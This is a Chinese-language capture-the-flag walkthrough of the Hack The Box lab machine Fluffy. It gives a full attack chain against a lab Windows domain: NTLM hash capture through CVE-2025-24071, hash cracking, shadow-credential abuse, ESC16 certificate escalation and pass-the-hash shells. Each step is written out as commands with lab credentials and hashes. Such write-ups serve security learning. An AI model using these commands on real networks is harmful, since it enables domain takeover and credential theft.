HTB Fluffy:从CVE-2025-24071到ESC16的完整域渗透指南

本文详细记录了HTB中Fluffy靶机的完整渗透过程。从初始凭证获取开始,利用CVE-2025-24071漏洞获取NetNTLMv2哈希,通过Bloodhound分析域关系,最终利用ESC16漏洞获取域管理员权限。涉及ADCS证书服务、Shadow Credential攻击等高级技术。

HTB: Fluffy

Fluffy是一个假设已入侵的Windows Active Directory挑战。我将从利用CVE-2025-24071 / CVE-2025-24055开始,这是Windows处理zip存档中library-ms文件方式的一个漏洞,会导致向攻击者进行身份验证尝试。我将获取NetNTLMv2并破解它。然后,Bloodhound数据显示该用户对某些服务账户具有GenericWrite权限。我将滥用此权限通过WinRM获取shell。最后利用ADCS环境中的ESC16漏洞获取Administrator权限。

靶机信息

项目 详情
名称 Fluffy
发布日期 2025年5月24日
退役日期 2025年9月20日
操作系统 Windows
基础分数 简单 [20]

场景:与真实Windows渗透测试一样,您将使用以下账户凭证开始Fluffy靶机: j.fleischman / J0elTHEM4n1990!

侦察

初始扫描

nmap发现多个开放的TCP端口,显示这是一个Windows域控制器。域是fluffy.htb,主机名是DC01

初始凭证

提供的凭证有效:

1

netexec smb dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!'

ADCS

使用netexec检查ADCS:

1

netexec ldap dc01.fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -M adcs

发现存在证书颁发机构fluffy-DC01-CA

Bloodhound

使用Bloodhound收集域数据:

1

bloodhound-ce-python -c all -d fluffy.htb -u j.fleischman -p 'J0elTHEM4n1990!' -ns 10.10.11.69 --zip

SMB - TCP 445

除了标准SMB共享外,还有一个IT共享,j.fleischman具有读写权限。共享中包含两个zip文件和一个PDF文档。

认证为p.agila

CVE-2025-24071 / CVE-2025-24054

漏洞背景:Windows Explorer处理包含恶意 crafted .library-ms文件的Zip或Rar存档时存在漏洞。当此恶意文件被提取或交互时,会触发向攻击者控制的服务器的NTLM身份验证尝试。

利用过程

  1. 使用POC脚本生成恶意zip文件
  2. 将exploit.zip上传到IT共享
  3. 启动Responder监听
  4. 等待系统自动提取zip文件触发认证

成功获取p.agila的NetNTLMv2哈希。

破解哈希

使用hashcat破解NetNTLMv2哈希:

1

hashcat p.agila.hash /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

获得密码:prometheusx-303

Shell作为winrm_svc

枚举

Bloodhound显示p.agila是Service Account Managers组成员,对Service Accounts组具有GenericAll权限。该组对winrm_svc等账户具有GenericWrite权限。

恢复winrm_svc的NTLM

  1. 将p.agila添加到Service Accounts组
1

bloodyAD -u p.agila -p prometheusx-303 -d fluffy.htb --host dc01.fluffy.htb add groupMember 'service accounts' p.agila
  1. 添加Shadow Credential
1

certipy shadow auto -u p.agila@fluffy.htb -p prometheusx-303 -account winrm_svc

获得winrm_svc的NTLM哈希:33bd09dcd697600edf6b3a7af4875767

WinRM

使用evil-winrm获取shell:

1

evil-winrm-py -i dc01.fluffy.htb -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767

成功获取user.txt。

Shell作为Administrator

枚举

Bloodhound显示Service Accounts组成员对ca_svc具有GenericWrite权限,ca_svc是Cert Publishers组成员。

ESC16

漏洞背景:CA全局配置为对所有颁发的证书禁用szOID_NTDS_CA_SECURITY_EXT安全扩展。没有此扩展,攻击者可以修改用户属性以获取任何用户的证书。

利用过程

  1. 更新UPN
1

certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn administrator update
  1. 请求证书
1

certipy req -u ca_svc -hashes ca0f4f9e9eb8a092addf53bb03fc98c8 -dc-ip 10.10.11.69 -target dc01.fluffy.htb -ca fluffy-DC01-CA -template User
  1. 恢复UPN
1

certipy account -u winrm_svc@fluffy.htb -hashes 33bd09dcd697600edf6b3a7af4875767 -user ca_svc -upn ca_svc@fluffy.htb update
  1. 认证获取NTLM哈希
1

certipy auth -dc-ip 10.10.11.69 -pfx administrator.pfx -u administrator -domain fluffy.htb

获得Administrator的NTLM哈希:8da83a3fa618b6e3a00e93f676c92a6e

Shell

使用evil-winrm获取Administrator shell:

1

evil-winrm-py -i dc01.fluffy.htb -u administrator -H 8da83a3fa618b6e3a00e93f676c92a6e

成功获取root.txt。

comments powered by Disqus
© 2020 - 2025 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次